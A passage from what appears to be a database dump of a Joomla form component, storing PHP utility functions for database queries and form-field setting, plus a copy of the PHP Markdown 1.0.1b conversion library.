$this->execPieceByName(\'ff_select\');\r\n\r\nCall syntax:\r\n\r\n $rows = ff_select($sql);\r\n\r\n $sql: Sql SELECT-statement to call\r\n $rows: List of row objects','Untyped','function ff_select($sql, $error=FF_DIE)\r\n{\r\n $database = JFactory::getDBO();\r\n $database->setQuery($sql);\r\n $rows = $database->loadObjectList();\r\n if ($database->getErrorNum()) {\r\n $dienow = $error==FF_DIE;\r\n $error = $database->stderr();\r\n $rows = array();\r\n if ($dienow) ff_die($error);\r\n } else\r\n $error = null;\r\n return $rows;\r\n} // ff_select'),(24,1,'FF','ff_selectValue','Select single value from db','Execute query to read a single value\r\n\r\nInclude by one of:\r\n\r\n $this->execPieceByName(\'ff_InitUtilities\');\r\n $this->execPieceByName(\'ff_SubmitUtilities\');\r\n if (!function_exists(\'ff_selectValue\')) $this->execPieceByName(\'ff_selectValue\');\r\n\r\nCall syntax:\r\n\r\n $value = ff_selectValue($sql);\r\n\r\n $sql: Sql SELECT-statement to call\r\n $value: The value returned by the database','Untyped','function ff_selectValue($sql, $def=null, $error=FF_DIE)\r\n{\r\n $database = JFactory::getDBO();\r\n $database->setQuery($sql);\r\n $value = $database->loadResult();\r\n if ($database->getErrorNum()) {\r\n $dienow = $error==FF_DIE;\r\n $error = $database->stderr();\r\n if ($dienow) ff_die($error);\r\n } else {\r\n $error = null;\r\n if ($value) return $value;\r\n } // if\r\n return $def;\r\n} // ff_selectValue'),(25,1,'FF','ff_setCheckedX','Set checkbox/radiobutton checked','Set a radio button or checkbox checked. \r\n\r\nCall: \r\n\r\n ff_setChecked(\'name\', \'value\');','Untyped','function ff_setChecked($name, $value)\r\n{\r\n global $ff_processor;\r\n for ($r = 0; $r < $ff_processor->rowcount; $r++) {\r\n $row =& $ff_processor->rows[$r];\r\n if ($row->name==$name && $row->data1==$value)\r\n $row->flag1 = 1;\r\n unset($row);\r\n } // for\r\n} // ff_setChecked'),(26,1,'FF','ff_setSelectedX','Set a select list option to *selected*','Sets a select list option to selected. \r\n\r\nCall: \r\n\r\n ff_setSelected(\'name\', \'value\');','Untyped','function ff_setSelected($name, $value)\r\n{\r\n global $ff_processor;\r\n for ($r = 0; $r < $ff_processor->rowcount; $r++) {\r\n $row =& $ff_processor->rows[$r];\r\n if ($row->name==$name)\r\n $row->data2 =\r\n preg_replace(\r\n \'/(^|\\r\\n|\\n)(0|1);([^;]*);(\'.$value.\')($|\\r\\n|\\n)/\',\r\n \'${1}1;${3};${4}${5}\',\r\n $row->data2\r\n );\r\n unset($row);\r\n } // for\r\n} // ff_setSelected'),(27,1,'FF','ff_setValueX','Set text, textarea, hidden value','Set value of a Static Text, Text, Textarea or Hidden Input. \r\n\r\nCall: \r\n\r\n ff_setValue(\'name\', \'value\');','Untyped','function ff_setValue($name, $value)\r\n{\r\n global $ff_processor;\r\n for ($r = 0; $r < $ff_processor->rowcount; $r++) {\r\n $row =& $ff_processor->rows[$r];\r\n if ($row->name==$name)\r\n $row->data1 = $value;\r\n unset($row);\r\n } // for\r\n} // ff_setValue'),(28,1,'FF','Markdown','Original Markdown Processor','Converts text marked up by \'Markdown\' into HTML.\r\n\r\nPlease use ff_markdown() in forms instead of Markdown()','Untyped','#\r\n# Markdown - A text-to-HTML conversion tool for web writers\r\n#\r\n# Copyright (c) 2004-2005 John Gruber\r\n# <http://daringfireball.net/projects/markdown/>\r\n#\r\n# Copyright (c) 2004-2005 Michel Fortin - PHP Port\r\n# <http://www.michelf.com/projects/php-markdown/>\r\n#\r\n\r\nglobal $MarkdownPHPVersion, $MarkdownSyntaxVersion,\r\n $md_empty_element_suffix, $md_tab_width,\r\n $md_nested_brackets_depth, $md_nested_brackets,\r\n $md_escape_table, $md_backslash_escape_table,\r\n $md_list_level;\r\n\r\n$MarkdownPHPVersion = \'1.0.1b\'; # Mon 6 Jun 2005\r\n$MarkdownSyntaxVersion = \'1.0.1\'; # Sun 12 Dec 2004\r\n\r\n\r\n#\r\n# Global default settings:\r\n#\r\n$md_empty_element_suffix = \" />\"; # Change to \">\" for HTML output\r\n$md_tab_width = 4;\r\n\r\n#\r\n# WordPress settings:\r\n#\r\n$md_wp_posts = true; # Set to false to remove Markdown from posts.\r\n$md_wp_comments = true; # Set to false to remove Markdown from comments.\r\n\r\n\r\n# -- WordPress Plugin Interface -----------------------------------------------\r\n/*\r\nPlugin Name: Markdown\r\nPlugin URI: http://www.michelf.com/projects/php-markdown/\r\nDescription: <a href=\"http://daringfireball.net/projects/markdown/syntax\">Markdown syntax</a> allows you to write using an easy-to-read, easy-to-write plain text format. Based on the original Perl version by <a href=\"http://daringfireball.net/\">John Gruber</a>. <a href=\"http://www.michelf.com/projects/php-markdown/\">More...</a>\r\nVersion: 1.0.1b\r\nAuthor: Michel Fortin\r\nAuthor URI: http://www.michelf.com/\r\n*/\r\nif (isset($wp_version)) {\r\n # More details about how it works here:\r\n # <http://www.michelf.com/weblog/2005/wordpress-text-flow-vs-markdown/>\r\n\r\n # Post content and excerpts\r\n if ($md_wp_posts) {\r\n remove_filter(\'the_content\', \'wpautop\');\r\n remove_filter(\'the_excerpt\', \'wpautop\');\r\n add_filter(\'the_content\', \'Markdown\', 6);\r\n add_filter(\'get_the_excerpt\', \'Markdown\', 6);\r\n add_filter(\'get_the_excerpt\', \'trim\', 7);\r\n add_filter(\'the_excerpt\', \'md_add_p\');\r\n add_filter(\'the_excerpt_rss\', \'md_strip_p\');\r\n\r\n remove_filter(\'content_save_pre\', \'balanceTags\', 50);\r\n remove_filter(\'excerpt_save_pre\', \'balanceTags\', 50);\r\n add_filter(\'the_content\', \'balanceTags\', 50);\r\n add_filter(\'get_the_excerpt\', \'balanceTags\', 9);\r\n\r\n function md_add_p($text) {\r\n if (strlen($text) == 0) return;\r\n if (strcasecmp(substr($text, -3), \'<p>\') == 0) return $text;\r\n return \'<p>\'.$text.\'</p>\';\r\n }\r\n function md_strip_p($t) { return preg_replace(\'{</?[pP]>}\', \'\', $t); }\r\n }\r\n\r\n # Comments\r\n if ($md_wp_comments) {\r\n remove_filter(\'comment_text\', \'wpautop\');\r\n remove_filter(\'comment_text\', \'make_clickable\');\r\n add_filter(\'pre_comment_content\', \'Markdown\', 6);\r\n add_filter(\'pre_comment_content\', \'md_hide_tags\', 8);\r\n add_filter(\'pre_comment_content\', \'md_show_tags\', 12);\r\n add_filter(\'get_comment_text\', \'Markdown\', 6);\r\n add_filter(\'get_comment_excerpt\', \'Markdown\', 6);\r\n add_filter(\'get_comment_excerpt\', \'md_strip_p\', 7);\r\n\r\n global $md_hidden_tags;\r\n $md_hidden_tags = array(\r\n \'<p>\' => md5(\'<p>\'), \'</p>\' => md5(\'</p>\'),\r\n \'<pre>\' => md5(\'<pre>\'), \'</pre>\'=> md5(\'</pre>\'),\r\n \'<ol>\' => md5(\'<ol>\'), \'</ol>\' => md5(\'</ol>\'),\r\n \'<ul>\' => md5(\'<ul>\'), \'</ul>\' => md5(\'</ul>\'),\r\n \'<li>\' => md5(\'<li>\'), \'</li>\' => md5(\'</li>\'),\r\n );\r\n\r\n function md_hide_tags($text) {\r\n global $md_hidden_tags;\r\n return str_replace(array_keys($md_hidden_tags),\r\n array_values($md_hidden_tags), $text);\r\n }\r\n function md_show_tags($text) {\r\n global $md_hidden_tags;\r\n return str_replace(array_values($md_hidden_tags),\r\n array_keys($md_hidden_tags), $text);\r\n }\r\n }\r\n}\r\n\r\n\r\n# -- bBlog Plugin Info --------------------------------------------------------\r\nfunction identify_modifier_markdown() {\r\n global $MarkdownPHPVersion;\r\n return array(\r\n \'name\' => \'markdown\',\r\n \'type\' => \'modifier\',\r\n \'nicename\' => \'Markdown\',\r\n \'description\' => \'A text-to-HTML conversion tool for web writers\',\r\n \'authors\' => \'Michel Fortin and John Gruber\',\r\n \'licence\' => \'GPL\',\r\n \'version\' => $MarkdownPHPVersion,\r\n \'help\' => \'<a href=\"http://daringfireball.net/projects/markdown/syntax\">Markdown syntax</a> allows you to write using an easy-to-read, easy-to-write plain text format. Based on the original Perl version by <a href=\"http://daringfireball.net/\">John Gruber</a>. <a href=\"http://www.michelf.com/projects/php-markdown/\">More...</a>\'\r\n );\r\n}\r\n\r\n# -- Smarty Modifier Interface ------------------------------------------------\r\nfunction smarty_modifier_markdown($text) {\r\n return Markdown($text);\r\n}\r\n\r\n# -- Textile Compatibility Mode -----------------------------------------------\r\n# Rename this file to \"classTextile.php\" and it can replace Textile anywhere.\r\nif (strcasecmp(substr(__FILE__, -16), \"classTextile.php\") == 0) {\r\n # Try to include PHP SmartyPants. Should be in the same directory.\r\n @include_once \'smartypants.php\';\r\n # Fake Textile class. It calls Markdown instead.\r\n class Textile {\r\n function TextileThis($text, $lite=\'\', $encode=\'\', $noimage=\'\', $strict=\'\') {\r\n if ($lite == \'\' && $encode == \'\') $text = Markdown($text);\r\n if (function_exists(\'SmartyPants\')) $text = SmartyPants($text);\r\n return $text;\r\n }\r\n }\r\n}\r\n\r\n\r\n\r\n#\r\n# Globals:\r\n#\r\n\r\n# Regex to match balanced [brackets].\r\n# Needed to insert a maximum bracked depth while converting to PHP.\r\n$md_nested_brackets_depth = 6;\r\n$md_nested_brackets =\r\n str_repeat(\'(?>[^\\[\\]]+|\\[\', $md_nested_brackets_depth).\r\n str_repeat(\'\\])*\', $md_nested_brackets_depth);\r\n\r\n# Table of hash values for escaped characters:\r\n$md_escape_table = array(\r\n \"\\\\\" => md5(\"\\\\\"),\r\n \"`\" => md5(\"`\"),\r\n \"*\" => md5(\"*\"),\r\n \"_\" => md5(\"_\"),\r\n \"{\" => md5(\"{\"),\r\n \"}\" => md5(\"}\"),\r\n \"[\" => md5(\"[\"),\r\n \"]\" => md5(\"]\"),\r\n \"(\" => md5(\"(\"),\r\n \")\" => md5(\")\"),\r\n \">\" => md5(\">\"),\r\n \"#\" => md5(\"#\"),\r\n \"+\" => md5(\"+\"),\r\n \"-\" => md5(\"-\"),\r\n \".\" => md5(\".\"),\r\n \"!\" => md5(\"!\")\r\n);\r\n# Create an identical table but for escaped characters.\r\n$md_backslash_escape_table;\r\nforeach ($md_escape_table as $key => $char)\r\n $md_backslash_escape_table[\"\\\\$key\"] = $char;\r\n\r\n\r\nfunction Markdown($text) {\r\n#\r\n# Main function. The order in which other subs are called here is\r\n# essential. Link and image substitutions need to happen before\r\n# _EscapeSpecialCharsWithinTagAttributes(), so that any *\'s or _\'s in the <a>\r\n# and <img> tags get encoded.\r\n#\r\n # Clear the global hashes. If we don\'t clear these, you get conflicts\r\n # from other articles when generating a page which contains more than\r\n # one article (e.g. an index page that shows the N most recent\r\n # articles):\r\n global $md_urls, $md_titles, $md_html_blocks;\r\n $md_urls = array();\r\n $md_titles = array();\r\n $md_html_blocks = array();\r\n\r\n # Standardize line endings:\r\n # DOS to Unix and Mac to Unix\r\n $text = str_replace(array(\"\\r\\n\", \"\\r\"), \"\\n\", $text);\r\n\r\n # Make sure $text ends with a couple of newlines:\r\n $text .= \"\\n\\n\";\r\n\r\n # Convert all tabs to spaces.\r\n $text = _Detab($text);\r\n\r\n # Strip any lines consisting only of spaces and tabs.\r\n # This makes subsequent regexen easier to write, because we can\r\n # match consecutive blank lines with /\\n+/ instead of something\r\n # contorted like /[ \\t]*\\n+/ .\r\n $text = preg_replace(\'/^[ \\t]+$/m\', \'\', $text);\r\n\r\n # Turn block-level HTML blocks into hash entries\r\n $text = _HashHTMLBlocks($text);\r\n\r\n # Strip link definitions, store in hashes.\r\n $text = _StripLinkDefinitions($text);\r\n\r\n $text = _RunBlockGamut($text);\r\n\r\n $text = _UnescapeSpecialChars($text);\r\n\r\n return $text . \"\\n\";\r\n}\r\n\r\n\r\nfunction _StripLinkDefinitions($text) {\r\n#\r\n# Strips link definitions from text, stores the URLs and titles in\r\n# hash references.\r\n#\r\n global $md_tab_width;\r\n $less_than_tab = $md_tab_width - 1;\r\n\r\n # Link defs are in the form: ^[id]: url \"optional title\"\r\n $text = preg_replace_callback(\'{\r\n ^[ ]{0,\'.$less_than_tab.\'}\\[(.+)\\]: # id = $1\r\n [ \\t]*\r\n \\n? # maybe *one* newline\r\n [ \\t]*\r\n <?(\\S+?)>? # url = $2\r\n [ \\t]*\r\n \\n? # maybe one newline\r\n [ \\t]*\r\n (?:\r\n (?<=\\s) # lookbehind for whitespace\r\n [\"(]\r\n (.+?) # title = $3\r\n [\")]\r\n [ \\t]*\r\n )? # title is optional\r\n (?:\\n+|\\Z)\r\n }xm\',\r\n \'_StripLinkDefinitions_callback\',\r\n $text);\r\n return $text;\r\n}\r\nfunction _StripLinkDefinitions_callback($matches) {\r\n global $md_urls, $md_titles;\r\n $link_id = strtolower($matches[1]);\r\n $md_urls[$link_id] = _EncodeAmpsAndAngles($matches[2]);\r\n if (isset($matches[3]))\r\n $md_titles[$link_id] = str_replace(\'\"\', \'"\', $matches[3]);\r\n return \'\'; # String that will replace the block\r\n}\r\n\r\n\r\nfunction _HashHTMLBlocks($text) {\r\n global $md_tab_width;\r\n $less_than_tab = $md_tab_width - 1;\r\n\r\n # Hashify HTML blocks:\r\n # We only want to do this for block-level HTML tags, such as headers,\r\n # lists, and tables. That\'s because we still want to wrap <p>s around\r\n # \"paragraphs\" that are wrapped in non-block-level tags, such as anchors,\r\n # phrase emphasis, and spans. The list of tags we\'re looking for is\r\n # hard-coded:\r\n $block_tags_a = \'p|div|h[1-6]|blockquote|pre|table|dl|ol|ul|\'.\r\n \'script|noscript|form|fieldset|iframe|math|ins|del\';\r\n $block_tags_b = \'p|div|h[1-6]|blockquote|pre|table|dl|ol|ul|\'.\r\n \'script|noscript|form|fieldset|iframe|math\';\r\n\r\n # First, look for nested blocks, e.g.:\r\n # <div>\r\n # <div>\r\n # tags for inner block must be indented.\r\n # </div>\r\n # </div>\r\n #\r\n # The outermost tags must start at the left margin for this to match, and\r\n # the inner nested divs must be indented.\r\n # We need to do this before the next, more liberal match, because the next\r\n # match will start at the first `<div>` and stop at the first `</div>`.\r\n $text = preg_replace_callback(\"{\r\n ( # save in $1\r\n ^ # start of line (with /m)\r\n <($block_tags_a) # start tag = $2\r\n \\\\b # word break\r\n (.*\\\\n)*? # any number of lines, minimally matching\r\n </\\\\2> # the matching end tag\r\n [ \\\\t]* # trailing spaces/tabs\r\n (?=\\\\n+|\\\\Z) # followed by a newline or end of document\r\n )\r\n }xm\",\r\n \'_HashHTMLBlocks_callback\',\r\n $text);\r\n\r\n #\r\n # Now match more liberally, simply from `\\n<tag>` to `</tag>\\n`\r\n #\r\n $text = preg_replace_callback(\"{\r\n ( # save in $1\r\n ^ # start of line (with /m)\r\n <($block_tags_b) # start tag = $2\r\n \\\\b # word break\r\n (.*\\\\n)*? # any number of lines, minimally matching\r\n .*</\\\\2> # the matching end tag\r\n [ \\\\t]* # trailing spaces/tabs\r\n (?=\\\\n+|\\\\Z) # followed by a newline or end of document\r\n )\r\n }xm\",\r\n \'_HashHTMLBlocks_callback\',\r\n $text);\r\n\r\n # Special case just for <hr />. It was easier to make a special case than\r\n # to make the other regex more complicated.\r\n $text = preg_replace_callback(\'{\r\n (?:\r\n (?<=\\n\\n) # Starting after a blank line\r\n | # or\r\n \\A\\n? # the beginning of the doc\r\n )\r\n ( # save in $1\r\n [ ]{0,\'.$less_than_tab.\'}\r\n <(hr) # start tag = $2\r\n \\b # word break\r\n ([^<>])*? #\r\n /?> # the matching end tag\r\n [ \\t]*\r\n (?=\\n{2,}|\\Z) # followed by a blank line or end of document\r\n )\r\n }x\',\r\n \'_HashHTMLBlocks_callback\',\r\n $text);\r\n\r\n # Special case for standalone HTML comments:\r\n $text = preg_replace_callback(\'{\r\n (?:\r\n (?<=\\n\\n) # Starting after a blank line\r\n | # or\r\n \\A\\n? # the beginning of the doc\r\n )\r\n ( # save in $1\r\n [ ]{0,\'.$less_than_tab.\'}\r\n (?s:\r\n <!\r\n (--.*?--\\s*)+\r\n >\r\n )\r\n [ \\t]*\r\n (?=\\n{2,}|\\Z) # followed by a blank line or end of document\r\n )\r\n }x\',\r\n \'_HashHTMLBlocks_callback\',\r\n $text);\r\n\r\n return $text;\r\n}\r\nfunction _HashHTMLBlocks_callback($matches) {\r\n global $md_html_blocks;\r\n $text = $matches[1];\r\n $key = md5($text);\r\n $md_html_blocks[$key] = $text;\r\n return \"\\n\\n$key\\n\\n\"; # String that will replace the block\r\n}\r\n\r\n\r\nfunction _RunBlockGamut($text) {\r\n#\r\n# These are all the transformations that form block-level\r\n# tags like paragraphs, headers, and list items.\r\n#\r\n global $md_empty_element_suffix;\r\n\r\n $text = _DoHeaders($text);\r\n\r\n # Do Horizontal Rules:\r\n $text = preg_replace(\r\n array(\'{^[ ]{0,2}([ ]?\\*[ ]?){3,}[ \\t]*$}mx\',\r\n \'{^[ ]{0,2}([ ]? -[ ]?){3,}[ \\t]*$}mx\',\r\n \'{^[ ]{0,2}([ ]? _[ ]?){3,}[ \\t]*$}mx\'),\r\n \"\\n<hr$md_empty_element_suffix\\n\",\r\n $text);\r\n\r\n $text = _DoLists($text);\r\n $text = _DoCodeBlocks($text);\r\n $text = _DoBlockQuotes($text);\r\n\r\n # We already ran _HashHTMLBlocks() before, in Markdown(), but that\r\n # was to escape raw HTML in the original Markdown source. This time,\r\n # we\'re escaping the markup we\'ve just created, so that we don\'t wrap\r\n # <p> tags around block-level tags.\r\n $text = _HashHTMLBlocks($text);\r\n $text = _FormParagraphs($text);\r\n\r\n return $text;\r\n}\r\n\r\n\r\nfunction _RunSpanGamut($text) {\r\n#\r\n# These are all the transformations that occur *within* block-level\r\n# tags like paragraphs, headers, and list items.\r\n#\r\n global $md_empty_element_suffix;\r\n\r\n $text = _DoCodeSpans($text);\r\n\r\n $text = _EscapeSpecialChars($text);\r\n\r\n # Process anchor and image tags. Images must come first,\r\n # because ![foo][f] looks like an anchor.\r\n $text = _DoImages($text);\r\n $text = _DoAnchors($text);\r\n\r\n # Make links out of things like `<http://example.com/>`\r\n # Must come after _DoAnchors(), because you can use < and >\r\n # delimiters in inline links like [this](<url>).\r\n $text = _DoAutoLinks($text);\r\n $text = _EncodeAmpsAndAngles($text);\r\n $text = _DoItalicsAndBold($text);\r\n\r\n # Do hard breaks:\r\n $text = preg_replace(\'/ {2,}\\n/\', \"<br$md_empty_element_suffix\\n\", $text);\r\n\r\n return $text;\r\n}\r\n\r\n\r\nfunction _EscapeSpecialChars($text) {\r\n global $md_escape_table;\r\n $tokens = _TokenizeHTML($text);\r\n\r\n $text = \'\'; # rebuild $text from the tokens\r\n# $in_pre = 0; # Keep track of when we\'re inside <pre> or <code> tags.\r\n# $tags_to_skip = \"!<(/?)(?:pre|code|kbd|script|math)[\\s>]!\";\r\n\r\n foreach ($tokens as $cur_token) {\r\n if ($cur_token[0] == \'tag\') {\r\n # Within tags, encode * and _ so they don\'t conflict\r\n # with their use in Markdown for italics and strong.\r\n # We\'re replacing each such character with its\r\n # corresponding MD5 checksum value; this is likely\r\n # overkill, but it should prevent us from colliding\r\n # with the escape values by accident.\r\n $cur_token[1] = str_replace(array(\'*\', \'_\'),\r\n array($md_escape_table[\'*\'], $md_escape_table[\'_\']),\r\n $cur_token[1]);\r\n $text .= $cur_token[1];\r\n } else {\r\n $t = $cur_token[1];\r\n $t = _EncodeBackslashEscapes($t);\r\n $text .= $t;\r\n }\r\n }\r\n return $text;\r\n}\r\n\r\n\r\nfunction _DoAnchors($text) {\r\n#\r\n# Turn Markdown link shortcuts into XHTML <a> tags.\r\n#\r\n global $md_nested_brackets;\r\n #\r\n # First, handle reference-style links: [link text] [id]\r\n #\r\n $text = preg_replace_callback(\"{\r\n ( # wrap whole match in $1\r\n \\\\[\r\n ($md_nested_brackets) # link text = $2\r\n \\\\]\r\n\r\n [ ]? # one optional space\r\n (?:\\\\n[ ]*)? # one optional newline followed by spaces\r\n\r\n \\\\[\r\n (.*?) # id = $3\r\n \\\\]\r\n )\r\n }xs\",\r\n \'_DoAnchors_reference_callback\', $text);\r\n\r\n #\r\n # Next, inline-style links: [link text](url \"optional title\")\r\n #\r\n $text = preg_replace_callback(\"{\r\n ( # wrap whole match in $1\r\n \\\\[\r\n ($md_nested_brackets) # link text = $2\r\n \\\\]\r\n \\\\( # literal paren\r\n [ \\\\t]*\r\n <?(.*?)>? # href = $3\r\n [ \\\\t]*\r\n ( # $4\r\n ([\'\\\"]) # quote char = $5\r\n (.*?) # Title = $6\r\n \\\\5 # matching quote\r\n )? # title is optional\r\n \\\\)\r\n )\r\n }xs\",\r\n \'_DoAnchors_inline_callback\', $text);\r\n\r\n return $text;\r\n}\r\nfunction _DoAnchors_reference_callback($matches) {\r\n global $md_urls, $md_titles, $md_escape_table;\r\n $whole_match = $matches[1];\r\n $link_text = $matches[2];\r\n $link_id = strtolower($matches[3]);\r\n\r\n if ($link_id == \"\") {\r\n $link_id = strtolower($link_text); # for shortcut links like [this][].\r\n }\r\n\r\n if (isset($md_urls[$link_id])) {\r\n $url = $md_urls[$link_id];\r\n # We\'ve got to encode these to avoid conflicting with italics/bold.\r\n $url = str_replace(array(\'*\', \'_\'),\r\n array($md_escape_table[\'*\'], $md_escape_table[\'_\']),\r\n $url);\r\n $result = \"<a href=\\\"$url\\\"\";\r\n if ( isset( $md_titles[$link_id] ) ) {\r\n $title = $md_titles[$link_id];\r\n $title = str_replace(array(\'*\', \'_\'),\r\n array($md_escape_table[\'*\'],\r\n $md_escape_table[\'_\']), $title);\r\n $result .= \" title=\\\"$title\\\"\";\r\n }\r\n $result .= \">$link_text</a>\";\r\n }\r\n else {\r\n $result = $whole_match;\r\n }\r\n return $result;\r\n}\r\nfunction _DoAnchors_inline_callback($matches) {\r\n global $md_escape_table;\r\n $whole_match = $matches[1];\r\n $link_text = $matches[2];\r\n $url = $matches[3];\r\n $title =& $matches[6];\r\n\r\n # We\'ve got to encode these to avoid conflicting with italics/bold.\r\n $url = str_replace(array(\'*\', \'_\'),\r\n array($md_escape_table[\'*\'], $md_escape_table[\'_\']),\r\n $url);\r\n $result = \"<a href=\\\"$url\\\"\";\r\n if (isset($title)) {\r\n $title = str_replace(\'\"\', \'"\', $title);\r\n $title = str_replace(array(\'*\', \'_\'),\r\n array($md_escape_table[\'*\'], $md_escape_table[\'_\']),\r\n $title);\r\n $result .= \" title=\\\"$title\\\"\";\r\n }\r\n\r\n $result .= \">$link_text</a>\";\r\n\r\n return $result;\r\n}\r\n\r\n\r\nfunction _DoImages($text) {\r\n#\r\n# Turn Markdown image shortcuts into <img> tags.\r\n#\r\n global $md_nested_brackets;\r\n\r\n #\r\n # First, handle reference-style labeled images: ![alt text][id]\r\n #\r\n $text = preg_replace_callback(\'{\r\n ( # wrap whole match in $1\r\n !\\[\r\n (\'.$md_nested_brackets.\') # alt text = $2\r\n \\]\r\n\r\n [ ]? # one optional space\r\n (?:\\n[ ]*)? # one optional newline followed by spaces\r\n\r\n \\[\r\n (.*?) # id = $3\r\n \\]\r\n\r\n )\r\n }xs\',\r\n \'_DoImages_reference_callback\', $text);\r\n\r\n #\r\n # Next, handle inline images: \r\n # Don\'t forget: encode * and _\r\n\r\n $text = preg_replace_callback(\'{\r\n ( # wrap whole match in $1\r\n !\\[\r\n (\'.$md_nested_brackets.\') # alt text = $2\r\n \\]\r\n \\( # literal paren\r\n [ \\t]*\r\n <?(\\S+?)>? # src url = $3\r\n [ \\t]*\r\n ( # $4\r\n ([\\\'\"]) # quote char = $5\r\n (.*?) # title = $6\r\n \\5 # matching quote\r\n [ \\t]*\r\n )? # title is optional\r\n \\)\r\n )\r\n }xs\',\r\n \'_DoImages_inline_callback\', $text);\r\n\r\n return $text;\r\n}\r\nfunction _DoImages_reference_callback($matches) {\r\n global $md_urls, $md_titles, $md_empty_element_suffix, $md_escape_table;\r\n $whole_match = $matches[1];\r\n $alt_text = $matches[2];\r\n $link_id = strtolower($matches[3]);\r\n\r\n if ($link_id == \"\") {\r\n $link_id = strtolower($alt_text); # for shortcut links like ![this][].\r\n }\r\n\r\n $alt_text = str_replace(\'\"\', \'"\', $alt_text);\r\n if (isset($md_urls[$link_id])) {\r\n $url = $md_urls[$link_id];\r\n # We\'ve got to encode these to avoid conflicting with italics/bold.\r\n $url = str_replace(array(\'*\', \'_\'),\r\n array($md_escape_table[\'*\'], $md_escape_table[\'_\']),\r\n $url);\r\n $result = \"<img src=\\\"$url\\\" alt=\\\"$alt_text\\\"\";\r\n if (isset($md_titles[$link_id])) {\r\n $title = $md_titles[$link_id];\r\n $title = str_replace(array(\'*\', \'_\'),\r\n array($md_escape_table[\'*\'],\r\n $md_escape_table[\'_\']), $title);\r\n $result .= \" title=\\\"$title\\\"\";\r\n }\r\n $result .= $md_empty_element_suffix;\r\n }\r\n else {\r\n # If there\'s no such link ID, leave intact:\r\n $result = $whole_match;\r\n }\r\n\r\n return $result;\r\n}\r\nfunction _DoImages_inline_callback($matches) {\r\n global $md_empty_element_suffix, $md_escape_table;\r\n $whole_match = $matches[1];\r\n $alt_text = $matches[2];\r\n $url = $matches[3];\r\n $title = \'\';\r\n if (isset($matches[6])) {\r\n $title = $matches[6];\r\n }\r\n\r\n $alt_text = str_replace(\'\"\', \'"\', $alt_text);\r\n $title = str_replace(\'\"\', \'"\', $title);\r\n # We\'ve got to encode these to avoid conflicting with italics/bold.\r\n $url = str_replace(array(\'*\', \'_\'),\r\n array($md_escape_table[\'*\'], $md_escape_table[\'_\']),\r\n $url);\r\n $result = \"<img src=\\\"$url\\\" alt=\\\"$alt_text\\\"\";\r\n if (isset($title)) {\r\n $title = str_replace(array(\'*\', \'_\'),\r\n array($md_escape_table[\'*\'], $md_escape_table[\'_\']),\r\n $title);\r\n $result .= \" title=\\\"$title\\\"\"; # $title already quoted\r\n }\r\n $result .= $md_empty_element_suffix;\r\n\r\n return $result;\r\n}\r\n\r\n\r\nfunction _DoHeaders($text) {\r\n # Setext-style headers:\r\n # Header 1\r\n # ========\r\n #\r\n # Header 2\r\n # --------\r\n #\r\n $text = preg_replace(\r\n array(\'{ ^(.+)[ \\t]*\\n=+[ \\t]*\\n+ }emx\',\r\n \'{ ^(.+)[ \\t]*\\n-+[ \\t]*\\n+ }emx\'),\r\n array(\"\'<h1>\'._RunSpanGamut(_UnslashQuotes(\'\\\\1\')).\'</h1>\\n\\n\'\",\r\n \"\'<h2>\'._RunSpanGamut(_UnslashQuotes(\'\\\\1\')).\'</h2>\\n\\n\'\"),\r\n $text);\r\n\r\n # atx-style headers:\r\n # # Header 1\r\n # ## Header 2\r\n # ## Header 2 with closing hashes ##\r\n # ...\r\n # ###### Header 6\r\n #\r\n $text = preg_replace(\"{\r\n ^(\\\\#{1,6}) # $1 = string of #\'s\r\n [ \\\\t]*\r\n (.+?) # $2 = Header text\r\n [ \\\\t]*\r\n \\\\#* # optional closing #\'s (not counted)\r\n \\\\n+\r\n }xme\",\r\n \"\'<h\'.strlen(\'\\\\1\').\'>\'._RunSpanGamut(_UnslashQuotes(\'\\\\2\')).\'</h\'.strlen(\'\\\\1\').\'>\\n\\n\'\",\r\n $text);\r\n\r\n return $text;\r\n}\r\n\r\n\r\nfunction _DoLists($text) {\r\n#\r\n# Form HTML ordered (numbered) and unordered (bulleted) lists.\r\n#\r\n global $md_tab_width, $md_list_level;\r\n $less_than_tab = $md_tab_width - 1;\r\n\r\n # Re-usable patterns to match list item bullets and number markers:\r\n $marker_ul = \'[*+-]\';\r\n $marker_ol = \'\\d+[.]\';\r\n $marker_any = \"(?:$marker_ul|$marker_ol)\";\r\n\r\n $markers = array($marker_ul, $marker_ol);\r\n\r\n foreach ($markers as $marker) {\r\n # Re-usable pattern to match any entirel ul or ol list:\r\n $whole_list = \'\r\n ( # $1 = whole list\r\n ( # $2\r\n [ ]{0,\'.$less_than_tab.\'}\r\n (\'.$marker.\') # $3 = first list item marker\r\n [ \\t]+\r\n )\r\n (?s:.+?)\r\n ( # $4\r\n \\z\r\n |\r\n \\n{2,}\r\n (?=\\S)\r\n (?! # Negative lookahead for another list item marker\r\n [ \\t]*\r\n \'.$marker.\'[ \\t]+\r\n )\r\n )\r\n )\r\n \'; // mx\r\n\r\n # We use a different prefix before nested lists than top-level lists.\r\n # See extended comment in _ProcessListItems().\r\n\r\n if ($md_list_level) {\r\n $text = preg_replace_callback(\'{\r\n ^\r\n \'.$whole_list.\'\r\n }mx\',\r\n \'_DoLists_callback_top\', $text);\r\n }\r\n else {\r\n $text = preg_replace_callback(\'{\r\n (?:(?<=\\n\\n)|\\A\\n?)\r\n \'.$whole_list.\'\r\n }mx\',\r\n \'_DoLists_callback_nested\', $text);\r\n }\r\n }\r\n\r\n return $text;\r\n}\r\nfunction _DoLists_callback_top($matches) {\r\n # Re-usable patterns to match list item bullets and number markers:\r\n $marker_ul = \'[*+-]\';\r\n $marker_ol = \'\\d+[.]\';\r\n $marker_any = \"(?:$marker_ul|$marker_ol)\";\r\n\r\n $list = $matches[1];\r\n $list_type = preg_match(\"/$marker_ul/\", $matches[3]) ? \"ul\" : \"ol\";\r\n\r\n $marker_any = ( $list_type == \"ul\" ? $marker_ul : $marker_ol );\r\n\r\n # Turn double returns into triple returns, so that we can make a\r\n # paragraph for the last item in a list, if necessary:\r\n $list = preg_replace(\"/\\n{2,}/\", \"\\n\\n\\n\", $list);\r\n $result = _ProcessListItems($list, $marker_any);\r\n\r\n # Trim any trailing whitespace, to put the closing `</$list_type>`\r\n # up on the preceding line, to get it past the current stupid\r\n # HTML block parser. This is a hack to work around the terrible\r\n # hack that is the HTML block parser.\r\n $result = rtrim($result);\r\n $result = \"<$list_type>\" . $result . \"</$list_type>\\n\";\r\n return $result;\r\n}\r\nfunction _DoLists_callback_nested($matches) {\r\n # Re-usable patterns to match list item bullets and number markers:\r\n $marker_ul = \'[*+-]\';\r\n $marker_ol = \'\\d+[.]\';\r\n 